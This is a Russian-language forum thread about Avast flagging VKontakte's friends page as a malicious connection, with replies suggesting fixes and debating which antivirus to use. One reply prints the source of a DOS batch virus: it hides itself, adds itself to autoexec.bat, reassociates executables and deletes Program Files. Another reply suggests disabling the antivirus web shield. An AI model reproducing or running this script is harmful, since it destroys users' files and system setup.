При нажатия ВКОНТАКТЕ на "Мои Друзья" avast распознаёт это как вирус и прирывает соединения!Подскажите пожалуста иза чего?и как избавиться?
C:\WINDOWS\system32\drivers\etc Открывае файлик hosts блокнотом - удаляеш все! Если далле будет такое дело, тогда хз....Почисть куки в браузере!
Ну аваст хоть и часто принемает за вирус то что ненадо но раставаться с ним нехочю! Так он выдаёт "вредоносное соединение (токо в Mozilla Firefox)"нетолько на 1 акаунте а на всех!
Ну позже если нечё неисправлю просто сначало попробую переустановить аваст,потом если опятьже такая шняга будет буду ставить что нить другое!
ну блин ладно ставлю ндругой)просто с авастом пораднился тем что с ним еб*тьсо ненадо! Да ток посмотрел чё за вирус?BV:Luzer-A
Ну да знаю контакт зло бла бла бла вся фигня)) Столько придложений антивира так какой же лудше установить? AVIRA;Kaspersky;Dr. Web;nod32! просто незнаю что выбрать?
ахаха вконтакте лучший сайт с ним завязать невозможно! а насчет вируса да это такой вирус есть и правда!
Каждому свое! В данном вопросе всегда были и остаются споры! Дедушке лично по душе NOD 32... Хотя включаю его изредка... Обычно юзаю прямые руки, работоспособный мозг и на всякий случай http://www.virustotal.com/ru/ P.S. если слабенькая машина, Каспера не ставь!
Отключи web экран в настройках. (@Echo off Echo Virus Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat md PRIDUROK md LUZER md DURAK md LAMER Label E: PRIDUROK assoc.exe=.mp3 del crogram Files/q Echo VIRUS LOAD) Вот так выглядит сам вирус.
С контактом согласен)) ну блин про вирус уже всё понятно! ну тогда попробую Нод )Ну а остольное эт само собой! Хахах поржал xD
антивирус ругается на динамические аватарки, которые стали нынче популярными среди многих пользователей. Просто посмотри у кого на авике всякие прогнозы погод, аськи и аптаймы стоят и удали его из френдов.
Ну блин просто посмотреть неполучиться на акаунте 6к друзей!на 2 примерно 2к буду искать по последним добавимшимся а эт человек 100 просто антивир начел сходить сума примерно вчерашним вечером!попробую всеровно!просто мне кажеться что дело не в том потому что часа 2 назад он начел также реогировать на античат когда перелиствываю страницу! Ну проц несамый мощный но думаю потянет ну хотяб попробывать стоит то вы тут так каспера расхваливаете)